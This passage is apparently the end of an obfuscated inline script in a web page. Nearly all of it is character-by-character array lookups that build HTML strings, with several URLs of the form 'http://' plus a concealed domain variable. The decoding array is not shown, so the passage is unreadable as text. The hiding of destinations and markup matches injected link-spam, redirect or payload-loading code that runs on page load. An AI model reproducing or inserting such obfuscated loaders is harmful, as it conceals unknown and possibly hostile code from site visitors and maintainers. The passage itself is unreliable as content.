+c7gs9b80[35]+c7gs9b80[8]+c7gs9b80[32]+c7gs9b80[34]+c7gs9b80[21]+c7gs9b80[10]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[25]+c7gs9b80[5]+c7gs9b80[10]+c7gs9b80[19]+c7gs9b80[24]+c7gs9b80[28]+c7gs9b80[5]+c7gs9b80[34]+c7gs9b80[32]+c7gs9b80[15]+c7gs9b80[5]+c7gs9b80[10]+c7gs9b80[41]+c7gs9b80[32]+c7gs9b80[30]+c7gs9b80[47]+c7gs9b80[47]+c7gs9b80[2]+c7gs9b80[24]+c7gs9b80[22]+c7gs9b80[11]+c7gs9b80[11]+c7gs9b80[19]+c7gs9b80[19]+c7gs9b80[19]+c7gs9b80[27]+c7gs9b80[47]+c7gs9b80[10]+c7gs9b80[5]+c7gs9b80[2]+c7gs9b80[5]+c7gs9b80[10]+c7gs9b80[43]+c7gs9b80[28]+c7gs9b80[51]+c7gs9b80[47]+c7gs9b80[27]+c7gs9b80[10]+c7gs9b80[5]+c7gs9b80[42]+c7gs9b80[11]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[1]+c7gs9b80[8]+c7gs9b80[32]+c7gs9b80[14]+c7gs9b80[1]+c7gs9b80[24]+c7gs9b80[47]+c7gs9b80[35]+c7gs9b80[3]+c7gs9b80[3]+c7gs9b80[32]+c7gs9b80[14]+c7gs9b80[47]+c7gs9b80[27]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[6]+c7gs9b80[27]+c7gs9b80[32]+c7gs9b80[9]+c7gs9b80[1]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[30]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[34]+c7gs9b80[21]+c7gs9b80[10]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[25]+c7gs9b80[5]+c7gs9b80[10]+c7gs9b80[19]+c7gs9b80[24]+c7gs9b80[28]+c7gs9b80[5]+c7gs9b80[34]+c7gs9b80[32]+c7gs9b80[10]+c7gs9b80[2]+c7gs9b80[28]+c7gs9b80[1]+c7gs9b80[32]+c7gs9b80[29]+c7gs9b80[10]+c7gs9b80[18]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[2]+c7gs9b80[28]+c7gs9b80[5]+c7gs9b80[24]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[35]+c7gs9b80[3]+c7gs9b80[32]+c7gs9b80[2]+c7gs9b80[35]+c7gs9b80[42]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[30]+c7gs9b80[28]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[22]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[30]+c7gs9b80[47]+c7gs9b80[47]+c7gs9b80[2]+c7gs9b80[22]+c7gs9b80[11]+c7gs9b80[11]+d8k8ylg+c7gs9b80[27]+c7gs9b80[41]+c7gs9b80[30]+c7gs9b80[3]+c7gs9b80[13]+c7gs9b80[53]+c7gs9b80[12]+c7gs9b80[41]+c7gs9b80[36]+c7gs9b80[45]+c7gs9b80[48]+c7gs9b80[24]+c7gs9b80[14]+c7gs9b80[10]+c7gs9b80[59]+c7gs9b80[51]+c7gs9b80[5]+c7gs9b80[36]+c7gs9b80[33]+c7gs9b80[59]+c7gs9b80[6]+c7gs9b80[58]+c7gs9b80[59]+c7gs9b80[43]+c7gs9b80[13]+c7gs9b80[48]+c7gs9b80[59]+c7gs9b80[36]+c7gs9b80[2]+c7gs9b80[42]+c7gs9b80[43]+c7gs9b80[35]+c7gs9b80[5]+c7gs9b80[35]+c7gs9b80[19]+c7gs9b80[5]+c7gs9b80[35]+c7gs9b80[48]+c7gs9b80[36]+c7gs9b80[10]+c7gs9b80[35]+c7gs9b80[15]+c7gs9b80[33]+c7gs9b80[19]+c7gs9b80[51]+c7gs9b80[6]+c7gs9b80[41]+c7gs9b80[43]+c7gs9b80[19]+c7gs9b80[14]+c7gs9b80[55]+c7gs9b80[30]+c7gs9b80[10]+c7gs9b80[28]+c7gs9b80[35]+c7gs9b80[35]+c7gs9b80[8]+c7gs9b80[27]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[14]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[11]+c7gs9b80[28]+c7gs9b80[42]+c7gs9b80[10]+c7gs9b80[13]+c7gs9b80[24]+c7gs9b80[43]+c7gs9b80[58]+c7gs9b80[51]+c7gs9b80[43]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[26]+c7gs9b80[10]+c7gs9b80[47]+c7gs9b80[28]+c7gs9b80[17]+c7gs9b80[32]+c7gs9b80[21]+c7gs9b80[30]+c7gs9b80[14]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[2]+c7gs9b80[35]+c7gs9b80[42]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[14]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[59]+c7gs9b80[35]+c7gs9b80[14]+c7gs9b80[3]+c7gs9b80[35]+c7gs9b80[48]+c7gs9b80[3]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[59]+c7gs9b80[14]+c7gs9b80[35]+c7gs9b80[32]+c7gs9b80[34]+c7gs9b80[21]+c7gs9b80[10]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[25]+c7gs9b80[5]+c7gs9b80[10]+c7gs9b80[19]+c7gs9b80[24]+c7gs9b80[28]+c7gs9b80[5]+c7gs9b80[34]+c7gs9b80[32]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[3]+c7gs9b80[29]+c7gs9b80[27]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[46]+c7gs9b80[3]+c7gs9b80[24]+c7gs9b80[10]+c7gs9b80[32]+c7gs9b80[29]+c7gs9b80[10]+c7gs9b80[18]+c7gs9b80[32]+c7gs9b80[51]+c7gs9b80[35]+c7gs9b80[1]+c7gs9b80[32]+c7gs9b80[18]+c7gs9b80[24]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[28]+c7gs9b80[41]+c7gs9b80[2]+c7gs9b80[10]+c7gs9b80[5]+c7gs9b80[35]+c7gs9b80[5]+c7gs9b80[29]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[8]+c7gs9b80[8]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[24]+c7gs9b80[24]+c7gs9b80[28]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[32]+c7gs9b80[29]+c7gs9b80[10]+c7gs9b80[18]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[2]+c7gs9b80[28]+c7gs9b80[5]+c7gs9b80[24]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[35]+c7gs9b80[3]+c7gs9b80[32]+c7gs9b80[2]+c7gs9b80[35]+c7gs9b80[42]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[19]+c7gs9b80[14]+c7gs9b80[47]+c7gs9b80[30]+c7gs9b80[10]+c7gs9b80[18]+c7gs9b80[47]+c7gs9b80[32]+c7gs9b80[18]+c7gs9b80[24]+c7gs9b80[14]+c7gs9b80[1]+c7gs9b80[42]+c7gs9b80[32]+c7gs9b80[34]+c7gs9b80[21]+c7gs9b80[10]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[25]+c7gs9b80[5]+c7gs9b80[10]+c7gs9b80[19]+c7gs9b80[24]+c7gs9b80[28]+c7gs9b80[5]+c7gs9b80[34]+c7gs9b80[22]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[30]+c7gs9b80[47]+c7gs9b80[47]+c7gs9b80[2]+c7gs9b80[22]+c7gs9b80[11]+c7gs9b80[11]+d8k8ylg+c7gs9b80[27]+c7gs9b80[5]+c7gs9b80[35]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[15]+c7gs9b80[14]+c7gs9b80[13]+c7gs9b80[27]+c7gs9b80[14]+c7gs9b80[1]+c7gs9b80[15]+c7gs9b80[10]+c7gs9b80[11]+c7gs9b80[28]+c7gs9b80[42]+c7gs9b80[10]+c7gs9b80[13]+c7gs9b80[24]+c7gs9b80[43]+c7gs9b80[58]+c7gs9b80[51]+c7gs9b80[43]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[30]+c7gs9b80[47]+c7gs9b80[47]+c7gs9b80[2]+c7gs9b80[22]+c7gs9b80[11]+c7gs9b80[11]+d8k8ylg+c7gs9b80[27]+c7gs9b80[10]+c7gs9b80[8]+c7gs9b80[8]+c7gs9b80[51]+c7gs9b80[10]+c7gs9b80[2]+c7gs9b80[29]+c7gs9b80[27]+c7gs9b80[14]+c7gs9b80[1]+c7gs9b80[15]+c7gs9b80[10]+c7gs9b80[11]+c7gs9b80[28]+c7gs9b80[42]+c7gs9b80[10]+c7gs9b80[13]+c7gs9b80[24]+c7gs9b80[43]+c7gs9b80[58]+c7gs9b80[51]+c7gs9b80[43]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[30]+c7gs9b80[47]+c7gs9b80[47]+c7gs9b80[2]+c7gs9b80[22]+c7gs9b80[11]+c7gs9b80[11]+d8k8ylg+c7gs9b80[27]+c7gs9b80[5]+c7gs9b80[35]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[8]+c7gs9b80[10]+c7gs9b80[27]+c7gs9b80[14]+c7gs9b80[1]+c7gs9b80[15]+c7gs9b80[10]+c7gs9b80[11]+c7gs9b80[28]+c7gs9b80[42]+c7gs9b80[10]+c7gs9b80[13]+c7gs9b80[24]+c7gs9b80[43]+c7gs9b80[58]+c7gs9b80[51]+c7gs9b80[43]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[30]+c7gs9b80[47]+c7gs9b80[47]+c7gs9b80[2]+c7gs9b80[22]+c7gs9b80[11]+c7gs9b80[11]+d8k8ylg+c7gs9b80[27]+c7gs9b80[10]+c7gs9b80[15]+c7gs9b80[5]+c7gs9b80[14]+c7gs9b80[24]+c7gs9b80[55]+c7gs9b80[27]+c7gs9b80[14]+c7gs9b80[1]+c7gs9b80[15]+c7gs9b80[10]+c7gs9b80[11]+c7gs9b80[28]+c7gs9b80[42]+c7gs9b80[10]+c7gs9b80[13]+c7gs9b80[24]+c7gs9b80[43]+c7gs9b80[58]+c7gs9b80[51]+c7gs9b80[43]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[26]+c7gs9b80[10]+c7gs9b80[47]+c7gs9b80[28]+c7gs9b80[17]+c7gs9b80[32]+c7gs9b80[21]+c7gs9b80[30]+c7gs9b80[28]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[28]+c7gs9b80[41]+c7gs9b80[2]+c7gs9b80[10]+c7gs9b80[5]+c7gs9b80[35]+c7gs9b80[5]+c7gs9b80[29]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[8]+c7gs9b80[8]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[24]+c7gs9b80[24]+c7gs9b80[28]+c7gs9b80[24]+c7gs9b80[17]+c7gs9b80[32]+c7gs9b80[21]+c7gs9b80[30]+c7gs9b80[28]+c7gs9b80[29]+c7gs9b80[32]+c7gs9b80[19]+c7gs9b80[14]+c7gs9b80[3]+c7gs9b80[3]+c7gs9b80[32]+c7gs9b80[48]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[59]+c7gs9b80[35]+c7gs9b80[14]+c7gs9b80[3]+c7gs9b80[35]+c7gs9b80[48]+c7gs9b80[3]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[15]+c7gs9b80[10]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[32]+c7gs9b80[3]+c7gs9b80[14]+c7gs9b80[41]+c7gs9b80[14]+c7gs9b80[47]+c7gs9b80[28]+c7gs9b80[8]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[41]+c7gs9b80[10]+c7gs9b80[18]+c7gs9b80[1]+c7gs9b80[47]+c7gs9b80[32]+c7gs9b80[10]+c7gs9b80[15]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[14]+c7gs9b80[41]+c7gs9b80[28]+c7gs9b80[17]);</script></body></html>
```